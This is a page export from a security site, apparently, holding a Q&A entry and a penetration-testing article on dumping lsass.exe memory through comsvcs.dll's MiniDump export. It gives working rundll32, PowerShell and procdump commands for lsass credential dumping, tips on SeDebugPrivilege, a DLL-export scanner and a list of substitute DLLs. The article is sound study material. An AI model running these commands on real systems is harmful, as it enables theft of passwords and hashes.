[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fivXVdtL2OHw47HWNYDd2V59dpjnuMsk4hHQpKQluoBk":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},864,"What other Windows system DLLs beside comsvcs.dll contain MiniDump-related exports?","The automated scan described in the article found that **dbghelp.dll** also exports `MiniDumpWriteDump` and `MiniDumpReadDumpStream`, and various **SOS.dll** files (from .NET Framework) export `MinidumpMode`. The scan identified multiple copies of comsvcs.dll in the winsxs directory as well. This shows that attackers could potentially use dbghelp.dll for similar purposes. The PowerShell script used to find these is available on GitHub and is similar to techniques used in [memory dumping via .NET assemblies](\u002Fnews\u002Fanalysis-of-exploitation-techniques-for-loading-net-assemblies-from-memory-assembly-load).","\u003Cp>The automated scan described in the article found that **dbghelp.dll** also exports `MiniDumpWriteDump` and `MiniDumpReadDumpStream`, and various **SOS.dll** files (from .NET Framework) export `MinidumpMode`. The scan identified multiple copies of comsvcs.dll in the winsxs directory as well. This shows that attackers could potentially use dbghelp.dll for similar purposes. The PowerShell script used to find these is available on GitHub and is similar to techniques used in [memory dumping via .NET assemblies](\u002Fnews\u002Fanalysis-of-exploitation-techniques-for-loading-net-assemblies-from-memory-assembly-load).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fexploitation-testing-of-minidumpwritedump-via-com-services-dll\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-other-windows-system-dlls-beside-comsvcsdll-contain-minidump-related-export-1777481662490","dbghelp.dll, SOS.dll, MiniDumpWriteDump, export function scanning, Windows DLLs, comsvcs.dll",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},211,"Exploitation Testing of \"MiniDumpWriteDump via COM+ Services DLL\"","exploitation-testing-of-minidumpwritedump-via-com-services-dll","Learn to exploit MiniDumpWriteDump via COM+ Services DLL for process memory dumps. Includes PowerShell automation, permission handling, and exploitation analysis for penetration testing.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, I studied a technique introduced in odzhan's article, which uses the export function MiniDump from C:\\windows\\system32\\comsvcs.dll to dump the memory file of a specified process.\u003C\u002Fp>\u003Cp>Article address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmodexp.wordpress.com\u002F2019\u002F08\u002F30\u002Fminidumpwritedump-via-com-services-dll\u002F\u003C\u002Fp>\u003Cp>This article will combine my own experience to supplement the points that need attention during testing, extend the methods, and analyze exploitation ideas. Write a PowerShell script to automatically scan all DLLs in the system directory for export functions, check for other usable DLLs, and introduce the details of script implementation.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Common methods for dumping memory files of specified processes\u003C\u002Fli>\u003Cli>Method for dumping memory files of specified processes using comsvcs.dll\u003C\u002Fli>\u003Cli>Writing a script to automatically scan DLL export functions\u003C\u002Fli>\u003Cli>Exploitation analysis\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Common methods for dumping memory files of specified processes\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In penetration testing, the most common method involves dumping the lsass.exe process to obtain plaintext passwords and hashes\u003C\u002Fp>\u003Cp>The principle relies on using the API MiniDumpWriteDump. Reference material:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fwin32\u002Fapi\u002Fminidumpapiset\u002Fnf-minidumpapiset-minidumpwritedump\u003C\u002Fp>\u003Cp>Common implementation methods are as follows:\u003C\u002Fp>\u003Ch3>1. procdump\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>procdump.exe -accepteula -ma lsass.exe lsass.dmp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. C++ implementation\u003C\u002Fh3>\u003Cp>https:\u002F\u002Fgithub.com\u002Fkillswitch-GUI\u002Fminidump-lib\u003C\u002Fp>\u003Ch3>3. PowerShell implementation\u003C\u002Fh3>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FExfiltration\u002FOut-Minidump.ps1\u003C\u002Fp>\u003Ch3>4. C# implementation\u003C\u002Fh3>\u003Cp>https:\u002F\u002Fgithub.com\u002FGhostPack\u002FSharpDump\u003C\u002Fp>\u003Ch2>0x03 Method to dump specified process memory files using comsvcs.dll\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Odzhan presented three methods in the article\u003C\u002Fp>\u003Ch3>1. Via rundll32\u003C\u002Fh3>\u003Cp>Example parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 808 C:\\test\\lsass.dmp full\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>In the example, the pid of lsass.exe is 808\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Here, attention must be paid to permission issues; when dumping the memory file of a specified process, the SeDebugPrivilege permission needs to be enabled\u003C\u002Fp>\u003Cp>Under cmd with administrator privileges, SeDebugPrivilege permission is supported by default, but its status is Disabled, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017257646_0_80a9b058db.jpeg\">\u003C\u002Fp>\u003Cp>Therefore, directly executing the rundll32 command under cmd to attempt to dump the memory file of a specified process will fail because the SeDebugPrivilege permission cannot be enabled\u003C\u002Fp>\u003Cp>Here is one of my solutions:\u003C\u002Fp>\u003Cp>Under PowerShell with administrator privileges, SeDebugPrivilege permission is supported by default, and its status is Enabled, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017282982_1_cb6c56ee9f.jpeg\">\u003C\u002Fp>\u003Cp>Thus, it can be achieved by executing the rundll32 command via PowerShell, with an example command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell -c \"rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 808 C:\\test\\lsass.dmp full\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Implementation via VBS\u003C\u002Fh3>\u003Cp>The original text provides complete implementation code\u003C\u002Fp>\u003Cp>The execution parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cscript 1.vbs lsass.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The VBS script first enables SeDebugPrivilege, then executes the rundll32 command, tested successfully\u003C\u002Fp>\u003Ch3>3. Implementation via C\u003C\u002Fh3>\u003Cp>The original text provides complete implementation code\u003C\u002Fp>\u003Cp>The code first enables SeDebugPrivilege, then calls the export function MiniDumpW from comsvcs.dll, tested successfully\u003C\u002Fp>\u003Ch2>0x04 Writing a script to automate scanning DLL export functions\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>After studying odzhan's article, I had a question:\u003C\u002Fp>\u003Cp>Are there other usable DLLs in the Windows system directory?\u003C\u002Fp>\u003Cp>Thus, I attempted to filter the export functions of all DLLs in the system directory via a script to check if they contain the export function MiniDumpW\u003C\u002Fp>\u003Cp>The script implementation needs to consider the following two issues:\u003C\u002Fp>\u003Ch3>1. Traverse the specified directory to obtain all DLLs\u003C\u002Fh3>\u003Cp>The test code for traversing the path C:\\windows is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ForEach($file in (Get-ChildItem -recurse -Filter \"*.dll\" -Path 'C:\\windows'  -ErrorAction SilentlyContinue )) \u003Cbr>{\u003Cbr>    $file.PSPath\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Since there are multiple levels of directories, it is necessary to obtain the absolute path of the DLL, and the format of $file.PSPath is Microsoft.PowerShell.Core\\FileSystem::C:\\windows\\RtlExUpd.dll, the actual path needs to remove the prefix\u003C\u002Fp>\u003Cp>The optimized code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ForEach($file in (Get-ChildItem -recurse -Filter \"*.dll\" -Path 'C:\\windows'  -ErrorAction SilentlyContinue )) \u003Cbr>{\u003Cbr>    $file.PSPath.Substring($file.PSPath.IndexOf(\":\")+2)\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Obtain the export functions of the specified DLL\u003C\u002Fh3>\u003Cp>You can refer to https:\u002F\u002Fgithub.com\u002FFuzzySecurity\u002FPowerShell-Suite\u002Fblob\u002Fmaster\u002FGet-Exports.ps1\u003C\u002Fp>\u003Cp>Based on this, optimize to achieve automated processing of the entire process\u003C\u002Fp>\u003Cp>The complete code has been uploaded to GitHub at the following address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code for filtering C:\\Windows is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\u002FGet-AllExports.ps1\u003Cbr>$Path = 'C:\\Windows'\u003Cbr>ForEach($file in (Get-ChildItem -recurse -Filter \"*.dll\" -Path $Path  -ErrorAction SilentlyContinue )) \u003Cbr>{\u003Cbr>#   $file.PSPath.Substring($file.PSPath.IndexOf(\":\")+2)\u003Cbr>    Get-Exports -DllPath $file.PSPath.Substring($file.PSPath.IndexOf(\":\")+2)\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test system: Win7x64\u003C\u002Fp>\u003Cp>Partial results:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[+] C:\\windows\\system32\\comsvcs.dll--&gt;MiniDumpW\u003Cbr>[+] C:\\windows\\system32\\dbghelp.dll--&gt;MiniDumpReadDumpStream\u003Cbr>[+] C:\\windows\\system32\\dbghelp.dll--&gt;MiniDumpWriteDump\u003Cbr>[+] C:\\Windows\\Syswow64\\comsvcs.dll--&gt;MiniDumpW\u003Cbr>[+] C:\\Windows\\Syswow64\\dbghelp.dll--&gt;MiniDumpReadDumpStream\u003Cbr>[+] C:\\Windows\\Syswow64\\dbghelp.dll--&gt;MiniDumpWriteDump\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\SOS.dll--&gt;MinidumpMode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\SOS.dll--&gt;Minidumpmode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\SOS.dll--&gt;minidumpmode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SOS.dll--&gt;MinidumpMode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SOS.dll--&gt;Minidumpmode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SOS.dll--&gt;minidumpmode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\SOS.dll--&gt;MinidumpMode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\SOS.dll--&gt;Minidumpmode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\SOS.dll--&gt;minidumpmode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\SOS.dll--&gt;MinidumpMode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\SOS.dll--&gt;Minidumpmode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\SOS.dll--&gt;minidumpmode\u003Cbr>[+] C:\\Windows\\winsxs\\amd64_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_ceb756d4b98f01a4\\comsvcs.dll--&gt;MiniDumpW\u003Cbr>[+] C:\\Windows\\winsxs\\amd64_microsoft-windows-imageanalysis_31bf3856ad364e35_6.1.7601.17514_none_a6821d2940c2bcdc\\dbghelp.dll--&gt;MiniDumpReadDumpStream\u003Cbr>[+] C:\\Windows\\winsxs\\amd64_microsoft-windows-imageanalysis_31bf3856ad364e35_6.1.7601.17514_none_a6821d2940c2bcdc\\dbghelp.dll--&gt;MiniDumpWriteDump\u003Cbr>[+] C:\\Windows\\winsxs\\x86_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_7298bb510131906e\\comsvcs.dll--&gt;MiniDumpW\u003Cbr>[+] C:\\Windows\\winsxs\\x86_microsoft-windows-imageanalysis_31bf3856ad364e35_6.1.7601.17514_none_4a6381a588654ba6\\dbghelp.dll--&gt;MiniDumpReadDumpStream\u003Cbr>[+] C:\\Windows\\winsxs\\x86_microsoft-windows-imageanalysis_31bf3856ad364e35_6.1.7601.17514_none_4a6381a588654ba6\\dbghelp.dll--&gt;MiniDumpWriteDump\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test results are as follows:\u003C\u002Fp>\u003Ch4>1. For processes with different architectures, the available DLLs differ.\u003C\u002Fh4>\u003Cp>For 32-bit processes, both 32-bit and 64-bit DLLs can be used:\u003C\u002Fp>\u003Cul>\u003Cli>C:\\windows\\system32\\comsvcs.dll\u003C\u002Fli>\u003Cli>C:\\Windows\\Syswow64\\comsvcs.dll\u003C\u002Fli>\u003Cli>C:\\Windows\\winsxs\\amd64_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_ceb756d4b98f01a4\\comsvcs.dll\u003C\u002Fli>\u003Cli>C:\\Windows\\winsxs\\x86_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_7298bb510131906e\\comsvcs.dll\u003C\u002Fli>\u003C\u002Ful>\u003Cp>For 64-bit processes, 64-bit DLLs can be used:\u003C\u002Fp>\u003Cul>\u003Cli>C:\\windows\\system32\\comsvcs.dll\u003C\u002Fli>\u003Cli>C:\\Windows\\winsxs\\amd64_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_ceb756d4b98f01a4\\comsvcs.dll\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Cannot use 32-bit DLL:\u003C\u002Fp>\u003Cul>\u003Cli>C:\\Windows\\Syswow64\\comsvcs.dll\u003C\u002Fli>\u003Cli>C:\\Windows\\winsxs\\x86_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_7298bb510131906e\\comsvcs.dll\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>2. dbghelp.dll corresponds to API MiniDumpWriteDump\u003C\u002Fh4>\u003Ch4>3. The exported function minidumpmode in SOS.dll\u003C\u002Fh4>\u003Cp>Used to prevent execution of unsafe commands when using minidump. 0 means disable this feature, 1 means enable. Default is 0\u003C\u002Fp>\u003Ch2>0x05 Exploitation Analysis\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>If you want to dump the memory file of a specified process, you can use the new method. Example command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell -c \"rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 808 C:\\test\\lsass.dmp full\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Where comsvcs.dll can be replaced with the following DLLs:\u003C\u002Fp>\u003Cul>\u003Cli>C:\\Windows\\Syswow64\\comsvcs.dll\u003C\u002Fli>\u003Cli>C:\\Windows\\winsxs\\amd64_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_ceb756d4b98f01a4\\comsvcs.dll\u003C\u002Fli>\u003Cli>C:\\Windows\\winsxs\\x86_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_7298bb510131906e\\comsvcs.dll\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The advantage of this method is that it does not require uploading files and can be implemented using the dlls included by default in the system.\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Based on odzhan's article, this paper supplements the points to note during testing, extends the methods, and analyzes exploitation ideas. A PowerShell script is written to automate scanning of all dll export functions in the system directory.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, I studied a technique introduced in odzhan's article, which uses the export function MiniDump from C:\\windows\\system32\\comsvcs.dll to dump the memory file of a specified process.\u003C\u002Fp>\u003Cp>Article address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fmodexp.wordpress.com\u002F2019\u002F08\u002F30\u002Fminidumpwritedump-via-com-services-dll\u002F\u003C\u002Fp>\u003Cp>This article will combine my own experience to supplement the points that need attention during testing, extend the methods, and analyze exploitation ideas. Write a PowerShell script to automatically scan all DLLs in the system directory for export functions, check for other usable DLLs, and introduce the details of script implementation.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Common methods for dumping memory files of specified processes\u003C\u002Fli>\u003Cli>Method for dumping memory files of specified processes using comsvcs.dll\u003C\u002Fli>\u003Cli>Writing a script to automatically scan DLL export functions\u003C\u002Fli>\u003Cli>Exploitation analysis\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Common methods for dumping memory files of specified processes\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In penetration testing, the most common method involves dumping the lsass.exe process to obtain plaintext passwords and hashes\u003C\u002Fp>\u003Cp>The principle relies on using the API MiniDumpWriteDump. Reference material:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fwin32\u002Fapi\u002Fminidumpapiset\u002Fnf-minidumpapiset-minidumpwritedump\u003C\u002Fp>\u003Cp>Common implementation methods are as follows:\u003C\u002Fp>\u003Ch3>1. procdump\u003C\u002Fh3>\u003Cp>Parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>procdump.exe -accepteula -ma lsass.exe lsass.dmp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. C++ implementation\u003C\u002Fh3>\u003Cp>https:\u002F\u002Fgithub.com\u002Fkillswitch-GUI\u002Fminidump-lib\u003C\u002Fp>\u003Ch3>3. PowerShell implementation\u003C\u002Fh3>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fmaster\u002FExfiltration\u002FOut-Minidump.ps1\u003C\u002Fp>\u003Ch3>4. C# implementation\u003C\u002Fh3>\u003Cp>https:\u002F\u002Fgithub.com\u002FGhostPack\u002FSharpDump\u003C\u002Fp>\u003Ch2>0x03 Method to dump specified process memory files using comsvcs.dll\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Odzhan presented three methods in the article\u003C\u002Fp>\u003Ch3>1. Via rundll32\u003C\u002Fh3>\u003Cp>Example parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 808 C:\\test\\lsass.dmp full\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>In the example, the pid of lsass.exe is 808\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Here, attention must be paid to permission issues; when dumping the memory file of a specified process, the SeDebugPrivilege permission needs to be enabled\u003C\u002Fp>\u003Cp>Under cmd with administrator privileges, SeDebugPrivilege permission is supported by default, but its status is Disabled, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017257646_0_80a9b058db-1.jpeg\">\u003C\u002Fp>\u003Cp>Therefore, directly executing the rundll32 command under cmd to attempt to dump the memory file of a specified process will fail because the SeDebugPrivilege permission cannot be enabled\u003C\u002Fp>\u003Cp>Here is one of my solutions:\u003C\u002Fp>\u003Cp>Under PowerShell with administrator privileges, SeDebugPrivilege permission is supported by default, and its status is Enabled, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017282982_1_cb6c56ee9f-1.jpeg\">\u003C\u002Fp>\u003Cp>Thus, it can be achieved by executing the rundll32 command via PowerShell, with an example command as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell -c \"rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 808 C:\\test\\lsass.dmp full\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Implementation via VBS\u003C\u002Fh3>\u003Cp>The original text provides complete implementation code\u003C\u002Fp>\u003Cp>The execution parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cscript 1.vbs lsass.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The VBS script first enables SeDebugPrivilege, then executes the rundll32 command, tested successfully\u003C\u002Fp>\u003Ch3>3. Implementation via C\u003C\u002Fh3>\u003Cp>The original text provides complete implementation code\u003C\u002Fp>\u003Cp>The code first enables SeDebugPrivilege, then calls the export function MiniDumpW from comsvcs.dll, tested successfully\u003C\u002Fp>\u003Ch2>0x04 Writing a script to automate scanning DLL export functions\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>After studying odzhan's article, I had a question:\u003C\u002Fp>\u003Cp>Are there other usable DLLs in the Windows system directory?\u003C\u002Fp>\u003Cp>Thus, I attempted to filter the export functions of all DLLs in the system directory via a script to check if they contain the export function MiniDumpW\u003C\u002Fp>\u003Cp>The script implementation needs to consider the following two issues:\u003C\u002Fp>\u003Ch3>1. Traverse the specified directory to obtain all DLLs\u003C\u002Fh3>\u003Cp>The test code for traversing the path C:\\windows is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ForEach($file in (Get-ChildItem -recurse -Filter \"*.dll\" -Path 'C:\\windows'  -ErrorAction SilentlyContinue )) \u003Cbr>{\u003Cbr>    $file.PSPath\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Since there are multiple levels of directories, it is necessary to obtain the absolute path of the DLL, and the format of $file.PSPath is Microsoft.PowerShell.Core\\FileSystem::C:\\windows\\RtlExUpd.dll, the actual path needs to remove the prefix\u003C\u002Fp>\u003Cp>The optimized code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ForEach($file in (Get-ChildItem -recurse -Filter \"*.dll\" -Path 'C:\\windows'  -ErrorAction SilentlyContinue )) \u003Cbr>{\u003Cbr>    $file.PSPath.Substring($file.PSPath.IndexOf(\":\")+2)\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Obtain the export functions of the specified DLL\u003C\u002Fh3>\u003Cp>You can refer to https:\u002F\u002Fgithub.com\u002FFuzzySecurity\u002FPowerShell-Suite\u002Fblob\u002Fmaster\u002FGet-Exports.ps1\u003C\u002Fp>\u003Cp>Based on this, optimize to achieve automated processing of the entire process\u003C\u002Fp>\u003Cp>The complete code has been uploaded to GitHub at the following address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>The code for filtering C:\\Windows is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Import-Module .\u002FGet-AllExports.ps1\u003Cbr>$Path = 'C:\\Windows'\u003Cbr>ForEach($file in (Get-ChildItem -recurse -Filter \"*.dll\" -Path $Path  -ErrorAction SilentlyContinue )) \u003Cbr>{\u003Cbr>#   $file.PSPath.Substring($file.PSPath.IndexOf(\":\")+2)\u003Cbr>    Get-Exports -DllPath $file.PSPath.Substring($file.PSPath.IndexOf(\":\")+2)\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test system: Win7x64\u003C\u002Fp>\u003Cp>Partial results:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[+] C:\\windows\\system32\\comsvcs.dll--&gt;MiniDumpW\u003Cbr>[+] C:\\windows\\system32\\dbghelp.dll--&gt;MiniDumpReadDumpStream\u003Cbr>[+] C:\\windows\\system32\\dbghelp.dll--&gt;MiniDumpWriteDump\u003Cbr>[+] C:\\Windows\\Syswow64\\comsvcs.dll--&gt;MiniDumpW\u003Cbr>[+] C:\\Windows\\Syswow64\\dbghelp.dll--&gt;MiniDumpReadDumpStream\u003Cbr>[+] C:\\Windows\\Syswow64\\dbghelp.dll--&gt;MiniDumpWriteDump\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\SOS.dll--&gt;MinidumpMode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\SOS.dll--&gt;Minidumpmode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\SOS.dll--&gt;minidumpmode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SOS.dll--&gt;MinidumpMode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SOS.dll--&gt;Minidumpmode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\SOS.dll--&gt;minidumpmode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\SOS.dll--&gt;MinidumpMode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\SOS.dll--&gt;Minidumpmode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\SOS.dll--&gt;minidumpmode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\SOS.dll--&gt;MinidumpMode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\SOS.dll--&gt;Minidumpmode\u003Cbr>[+] C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\SOS.dll--&gt;minidumpmode\u003Cbr>[+] C:\\Windows\\winsxs\\amd64_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_ceb756d4b98f01a4\\comsvcs.dll--&gt;MiniDumpW\u003Cbr>[+] C:\\Windows\\winsxs\\amd64_microsoft-windows-imageanalysis_31bf3856ad364e35_6.1.7601.17514_none_a6821d2940c2bcdc\\dbghelp.dll--&gt;MiniDumpReadDumpStream\u003Cbr>[+] C:\\Windows\\winsxs\\amd64_microsoft-windows-imageanalysis_31bf3856ad364e35_6.1.7601.17514_none_a6821d2940c2bcdc\\dbghelp.dll--&gt;MiniDumpWriteDump\u003Cbr>[+] C:\\Windows\\winsxs\\x86_microsoft-windows-c..fe-catsrvut-comsvcs_31bf3856ad364e35_6.1.7600.16385_none_7298bb510131906e\\comsvcs.dll--&gt;MiniDumpW\u003Cbr>[+] 